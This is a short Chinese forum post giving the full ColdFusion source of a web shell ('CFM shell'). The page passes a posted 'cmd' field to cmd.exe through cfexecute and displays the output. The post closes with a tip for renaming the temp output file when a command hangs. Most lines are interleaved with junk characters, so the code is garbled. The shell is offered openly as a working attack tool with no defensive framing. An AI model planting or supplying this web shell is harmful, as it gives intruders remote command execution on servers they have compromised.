cfm的cmdshell使用注意

admin

cfm-cmdshell
<html>   
3 z4 H$ u) i" I$ P2 D<head>   
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">   
8 ^" F; s. s6 g4 Q<title>CFM shell</title>   
</head>   
! d$ P* I5 Q' w8 A* C<body>   
<!--- os.run --->   
<cfif IsDefined("FORM.cmd")>   
9 t0 `8 g0 i; ^' r% D    <cfoutput>#cmd#</cfoutput>   
% E4 _5 R  l9 |2 V8 W# O6 g6 O    <cfexecute name="C:\Winnt\System32\cmd.exe"   
! v: `6 @# t' Q+ z. k5 K           arguments="/c #cmd#"   
           outputfile="#GetTempDirectory()#foobar.txt"   
           timeout="1">   
    </cfexecute>   
( S( ]. w; `0 G1 A7 ^3 A</cfif>   
<form action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" method="post">   
6 ^  B- X' q, \* ?4 c$ N8 d8 k: y<input type=text size=45 name="cmd" >   
3 K0 _; |7 q; ]  v( L4 a: X<input type=Submit value="run">   
5 j6 P/ f' {9 U9 t) m</form>   
<cfif FileExists("#GetTempDirectory()#foobar.txt") is "Yes">   
6 z! V% a/ s6 D/ s( ]- q  <cffile action="Read"   
            file="#GetTempDirectory()#foobar.txt"   
            variable="readText">   
<textarea readonly cols=80 rows=20>   
<CFOUTPUT>#readText#</CFOUTPUT>            
</textarea>   
6 K5 K. X9 g3 r: z8 B5 V2 i7 X    <cffile action="Delete"   
, @, O, ]/ M/ b( @5 g            file="#GetTempDirectory()#foobar.txt">   
</cfif>   
1 _7 F+ Q# H% M, o/ N</body>   
6 k6 E0 U3 K( C5 D</html>   
! y9 F( h/ y" ~2 R( K
有时候会发现执行某次cmd后没有正常结束，造成后面不能执行命令。这时候只要修改下shell的foobar.txt名字，几处都改一下就可以了。想来是程序未正常退出，文件被占用，写不进去了。
3 N8 j6 @) l0 @* v) ^% h